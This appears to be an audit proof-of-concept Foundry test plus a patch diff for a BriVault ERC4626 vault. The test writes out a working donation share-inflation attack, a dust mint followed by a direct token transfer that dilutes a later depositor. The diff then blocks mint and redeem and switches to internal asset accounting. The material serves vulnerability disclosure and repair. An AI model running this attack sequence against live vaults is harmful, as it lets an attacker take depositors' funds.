pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {BriVault} from "../src/briVault.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {MockERC20} from "./MockErc20.t.sol";
/// @title PoC: dust `mint` followed by a direct token donation dilutes later depositors
/// @notice The attacker mints a tiny number of shares through the ERC4626 `mint`
///         entry point, then transfers tokens straight to the vault. The victim's
///         subsequent `deposit` is expected to receive fewer shares than the attacker
///         holds, even though the victim stakes far more.
contract ShareCalcManipulationWithMintTest is Test {
    BriVault briVault;
    MockERC20 mockToken;

    address owner = makeAddr("owner");
    address attacker = makeAddr("attacker");
    address victim = makeAddr("victim");
    address feeAddr = makeAddr("fee");

    uint256 start;
    uint256 end;

    /// @notice Deploys the mock token and the vault, funds both actors and
    ///         grants the vault an unlimited allowance from each of them.
    function setUp() public {
        start = block.timestamp + 2 days;
        end = start + 30 days;

        mockToken = new MockERC20("Mock Token", "MTK");
        mockToken.mint(attacker, 1000 ether);
        mockToken.mint(victim, 1000 ether);

        vm.startPrank(owner);
        // NOTE(review): argument meanings are inferred from the names used here
        // (150 is presumably the participation fee in basis points and 0.1 ether
        // the minimum amount) - confirm against the BriVault constructor.
        briVault = new BriVault(
            IERC20(address(mockToken)),
            150,
            start,
            feeAddr,
            0.1 ether,
            end
        );
        vm.stopPrank();

        vm.prank(attacker);
        mockToken.approve(address(briVault), type(uint256).max);
        vm.prank(victim);
        mockToken.approve(address(briVault), type(uint256).max);
    }

    /// @notice Shows that a victim depositing 100 tokens after the donation ends up
    ///         with fewer shares than the attacker obtained for a dust mint.
    function test_MintThenDonateDilutesVictimDeposits() public {
        uint256 dustShares = 0.001 ether;

        vm.startPrank(attacker);
        // ERC4626 `mint` returns the amount of ASSETS pulled, not the shares minted,
        // so the attacker's share balance is read back explicitly.
        briVault.mint(dustShares, attacker);
        uint256 attackerShares = briVault.balanceOf(attacker);
        assertEq(attackerShares, dustShares, "attacker got dust shares via mint");

        // Donation: tokens sent directly to the vault, bypassing deposit().
        mockToken.transfer(address(briVault), 500 ether);
        vm.stopPrank();

        vm.startPrank(victim);
        uint256 victimShares = briVault.deposit(100 ether, victim);
        vm.stopPrank();

        assertGt(attackerShares, 0, "attacker retains initial shares capturing donated value");
        // Comparing against 100 ether alone is vacuous: the deposit stakes less than
        // the full amount once the fee is taken, so it would hold even at a fair 1:1
        // price. Comparing against the attacker's dust position proves dilution.
        assertLt(victimShares, attackerShares, "victim severely diluted by donation-inflated denominator");
        assertLt(victimShares, 100 ether, "victim severely diluted by donation-inflated denominator");
    }
}
@@
+ // --- ERC4626 share-denominated entry points are switched off ---
+ // Both overrides below revert unconditionally, so these two functions can no
+ // longer be used to bypass the vault's own accounting and fee logic.
+ // NOTE(review): only mint/redeem are overridden in this hunk - confirm whether the
+ // inherited ERC4626 withdraw(uint256,address,address) also needs to be blocked.
+
+ /// @dev Raised by every call to `mint`.
+ error erc4626DirectMintDisabled();
+
+ /// @notice Disabled entry point: always reverts with `erc4626DirectMintDisabled`.
+ /// @dev Arguments are ignored and no value is ever returned.
+ function mint(uint256 shares, address receiver) public override returns (uint256) {
+ revert erc4626DirectMintDisabled();
+ }
+
+ /// @dev Raised by every call to `redeem`.
+ error erc4626DirectRedeemDisabled();
+
+ /// @notice Disabled entry point: always reverts with `erc4626DirectRedeemDisabled`.
+ /// @dev Arguments are ignored and no value is ever returned.
+ function redeem(uint256 shares, address receiver, address owner) public override returns (uint256) {
+ revert erc4626DirectRedeemDisabled();
+ }
@@
- function _convertToShares(uint256 assets) internal view returns (uint256 shares) {
- uint256 balanceOfVault = IERC20(asset()).balanceOf(address(this));
- uint256 totalShares = totalSupply();
- if (totalShares == 0 || balanceOfVault == 0) {
- return assets;
- }
- shares = Math.mulDiv(assets, totalShares, balanceOfVault);
- }
+ /// @notice Asset total tracked by the vault's internal accounting.
+ /// @dev Used as the share-price denominator instead of the token balance, so
+ ///      tokens sent directly to the vault do not change the conversion rate.
+ uint256 public accountingAssets;
+
+ /// @notice Converts an asset amount into shares at the accounted ratio.
+ /// @dev Returns `assets` unchanged (1:1) while the share supply or
+ ///      `accountingAssets` is zero; otherwise returns
+ ///      `assets * totalSupply() / accountingAssets` via `Math.mulDiv`.
+ ///      The result depends on the value of `accountingAssets` at call time, so a
+ ///      caller pricing a new deposit should call this before adding that deposit
+ ///      to `accountingAssets`.
+ /// @param assets Amount of underlying assets to price.
+ /// @return shares Amount of shares corresponding to `assets`.
+ function _convertToShares(uint256 assets) internal view returns (uint256 shares) {
+ uint256 supply = totalSupply();
+ uint256 accounted = accountingAssets;
+ // Nothing minted or nothing accounted yet: bootstrap at 1:1.
+ bool bootstrapping = supply == 0 || accounted == 0;
+ shares = bootstrapping ? assets : Math.mulDiv(assets, supply, accounted);
+ }
@@
- function deposit(uint256 assets, address receiver) public override returns (uint256) {
+ /// @notice Deposits `assets`, sends the participation fee to the fee address and
+ ///         mints shares for the remainder to `receiver`.
+ /// @dev Reverts with `eventStarted` once block.timestamp >= eventStartDate and with
+ ///      `lowFeeAndAmount` when `assets` is below `minimumAmount + fee`.
+ ///      Shares are priced from the amount actually received by the vault and
+ ///      against the accounted total as it stood BEFORE this deposit.
+ /// @param assets Gross amount supplied by the caller, fee included.
+ /// @param receiver Account credited with the shares and the recorded stake.
+ /// @return Amount of shares minted to `receiver`.
+ function deposit(uint256 assets, address receiver) public override returns (uint256) {
if (block.timestamp >= eventStartDate) { revert eventStarted(); }
uint256 fee = _getParticipationFee(assets);
if (minimumAmount + fee > assets) { revert lowFeeAndAmount(); }
- uint256 stakeAsset = assets - fee;
- uint256 participantShares = _convertToShares(stakeAsset);
- IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
- IERC20(asset()).safeTransferFrom(msg.sender, address(this), stakeAsset);
- _mint(msg.sender, participantShares);
- stakedAsset[receiver] = stakeAsset;
+ uint256 nominal = assets - fee;
+ IERC20(asset()).safeTransferFrom(msg.sender, participationFeeAddress, fee);
+ // Measure actual received (handles fee-on-transfer tokens)
+ uint256 before = IERC20(asset()).balanceOf(address(this));
+ IERC20(asset()).safeTransferFrom(msg.sender, address(this), nominal);
+ uint256 received = IERC20(asset()).balanceOf(address(this)) - before;
+ require(received > 0, "zero received");
+ // Price the deposit against the pre-deposit accounted total. Updating
+ // accountingAssets first would put this deposit in its own denominator and
+ // under-mint every deposit after the first one.
+ uint256 participantShares = _convertToShares(received);
+ // Update internal accounting; donations won't alter this
+ accountingAssets += received;
+ _mint(receiver, participantShares);
+ stakedAsset[receiver] += received;
emit deposited(receiver, /* stake */ received);
return participantShares;
}
@@
- function _setFinallizedVaultBalance () internal returns (uint256) {
- if (block.timestamp <= eventStartDate) { revert eventNotStarted(); }
- return finalizedVaultAsset = IERC20(asset()).balanceOf(address(this));
- }
+ /// @notice Snapshots the accounted asset total into `finalizedVaultAsset`.
+ /// @dev Reverts with `eventNotStarted` while block.timestamp <= eventStartDate.
+ ///      Reads `accountingAssets` rather than the token balance, so tokens sent
+ ///      directly to the vault are not part of the snapshot.
+ ///      NOTE(review): any path that moves assets out of the vault before this is
+ ///      called would need to reduce `accountingAssets` too - confirm against the
+ ///      rest of the contract.
+ /// @return The value stored in `finalizedVaultAsset`.
+ function _setFinallizedVaultBalance () internal returns (uint256) {
+ if (block.timestamp <= eventStartDate) revert eventNotStarted();
+ finalizedVaultAsset = accountingAssets;
+ return finalizedVaultAsset;
+ }